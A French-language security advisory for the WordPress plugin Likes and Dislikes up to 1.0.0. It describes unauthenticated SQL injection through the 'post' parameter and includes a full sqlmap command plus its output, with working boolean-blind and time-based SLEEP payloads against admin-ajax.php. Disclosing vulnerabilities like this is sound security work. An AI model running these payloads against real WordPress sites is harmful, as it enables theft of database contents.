
Likes and Dislikes Plugin <= 1.0.0 - Injection SQL non authentifiée
Plugin Likes and Dislikes <= 1.0.0 - Injection SQL non authentifiée
Le plugin Likes and Dislikes pour WordPress est vulnérable à une injection SQL via le paramètre « post » dans toutes les versions jusqu'à la version 1.0.0 incluse, en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'un manque de préparation suffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes existantes, qui peuvent être utilisées pour extraire des informations sensibles de la base de données.
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
sqlmap a identifié le ou les points d'injection suivants avec un total de 372 requêtes HTTP :
---
Paramètre : post (POST)
Type : aveugle basé sur un booléen
Titre : AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload : action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike
Type : aveugle basé sur le temps
Titre : MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload : action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---